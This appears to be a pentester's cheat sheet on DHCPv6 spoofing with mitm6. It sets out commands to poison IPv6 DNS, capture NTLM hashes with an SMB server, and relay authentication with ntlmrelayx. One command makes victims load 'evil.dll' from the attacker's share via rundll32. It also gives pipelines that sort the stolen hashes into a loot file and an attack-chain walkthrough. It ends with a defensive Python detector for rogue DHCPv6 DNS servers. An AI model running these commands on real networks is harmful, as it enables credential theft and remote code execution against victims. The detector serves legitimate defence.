# DHCPv6 Spoofing

* <https://g-laurent.blogspot.com/2021/12/responder-and-ipv6-attacks.html>

## mitm6

* <https://github.com/fox-it/mitm6>
* <https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/>
* <https://intrinium.com/mitm6-pen-testing/>

Install:

```
$ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6
$ python3 setup.py install

# Or
$ pipx install -f "git+https://github.com/fox-it/mitm6.git"
```

Generate a list of targets for NTLM relay and prepare a C2 listener and stager:

```
$ cme smb 192.168.1.0/24 --gen-relay-list relay.txt
```

Start an SMB server to capture NTLM hashes and serve the stager:

```
$ smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out
```

Get ready to relay authentication and try executing a command:

```
$ ntlmrelayx.py -6 -tf relay.txt -wh attacker-wpad -c 'cmd /c C:\Windows\System32\rundll32.exe \\10.10.13.37\share\evil.dll, SVywATCKorN' --no-smb-server --no-wcf-server --no-raw-server
```

Start MitMing:

```
$ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn
```

Parse, sort and save NTLM hashes:

```
# Users
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | cut -c 5- | grep -v '\$' > net-ntlmv2.mitm6
$ sort -u -t: -k1,1 net-ntlmv2.mitm6 ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.mitm6

# Machines
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | grep '\$' | cut -c 5- | sort -u -t: -k1,1
```

### Attack vectors

Grab hashes with `smbserver.py` (passive):

1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network.
2. Victims start to use the attacker's machine as their primary DNS server.
3. `mitm6.py` on the attacker's machine acts like a rogue DNS server and responds with the attacker's IP for all incoming queries.
4. `smbserver.py` collects hashes during SMB requests from victims.

Relay authentication with `ntlmrelayx.py` (active):

1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network.
2. Victims start to use the attacker's machine as their primary DNS server.
3. `mitm6.py` on the attacker's machine acts as a rogue DNS server and responds with the attacker's IP to all incoming DNS queries, while `ntlmrelayx.py` serves a custom WPAD file that points at a nonexistent hostname (which resolves to the attacker's IP anyway) and acts as a rogue proxy server.
4. Victims fetch the WPAD file and ask the rogue IPv6 DNS server (the attacker's machine) to resolve the proxy's hostname, which resolves to the attacker's machine.
5. Victims connect to the rogue proxy server, where `ntlmrelayx.py` responds with `HTTP 407 Proxy Authentication`.
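Both chains above start with the same step: a client accepts a DHCPv6 Advertise/Reply that hands it a DNS server it should not trust. The following added example (not from this page or from mitm6) is a small detection helper for the blue team side: it parses the DHCPv6 message format (RFC 8415 header plus type/length options) and flags any advertised DNS server that is not on an allow-list. The sample packets and the `2001:db8::53` allow-list are constructed for the example; the `fe80::1337` address is a made-up rogue server, not a real indicator.

```python
import ipaddress
import struct

# DHCPv6 message types and option codes as defined in RFC 8415
MSG_ADVERTISE, MSG_REPLY = 2, 7
OPT_DNS_SERVERS = 23


def parse_dhcpv6(payload: bytes):
    """Parse a DHCPv6 UDP payload into (msg_type, transaction_id, [(code, data), ...])."""
    if len(payload) < 4:
        raise ValueError("truncated DHCPv6 header")
    msg_type = payload[0]                              # 1-byte msg-type
    xid = int.from_bytes(payload[1:4], "big")          # 3-byte transaction-id
    options, off = [], 4
    while off + 4 <= len(payload):                     # each option: code(2) len(2) data
        code, length = struct.unpack_from("!HH", payload, off)
        off += 4
        if off + length > len(payload):
            raise ValueError("option runs past end of packet")
        options.append((code, payload[off:off + length]))
        off += length
    return msg_type, xid, options


def rogue_dns_servers(payload: bytes, allowed_dns: set) -> list:
    """Return DNS servers pushed by an Advertise/Reply that are not on the allow-list."""
    allowed = {str(ipaddress.IPv6Address(a)) for a in allowed_dns}   # normalise notation
    msg_type, _, options = parse_dhcpv6(payload)
    if msg_type not in (MSG_ADVERTISE, MSG_REPLY):     # Solicit/Request etc. carry no offer
        return []
    rogue = []
    for code, data in options:
        if code != OPT_DNS_SERVERS:
            continue
        for i in range(0, len(data) - len(data) % 16, 16):   # list of 16-byte addresses
            addr = str(ipaddress.IPv6Address(data[i:i + 16]))
            if addr not in allowed:
                rogue.append(addr)
    return rogue


def build_advertise(xid: int, dns: str) -> bytes:
    """Constructed test fixture: an Advertise carrying one DNS_SERVERS option (not a capture)."""
    dns_opt = struct.pack("!HH", OPT_DNS_SERVERS, 16) + ipaddress.IPv6Address(dns).packed
    return bytes([MSG_ADVERTISE]) + xid.to_bytes(3, "big") + dns_opt


if __name__ == "__main__":
    allowed = {"2001:db8::53"}                         # the corporate resolver (constructed)
    for pkt in (build_advertise(0xABCDEF, "2001:db8::53"), build_advertise(0x123456, "fe80::1337")):
        print("rogue DNS servers:", rogue_dns_servers(pkt, allowed))
```

In practice the payload would come from UDP port 546 traffic on a capture or a span port; a non-empty result on a segment that does not run DHCPv6 at all is the clearest signal.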
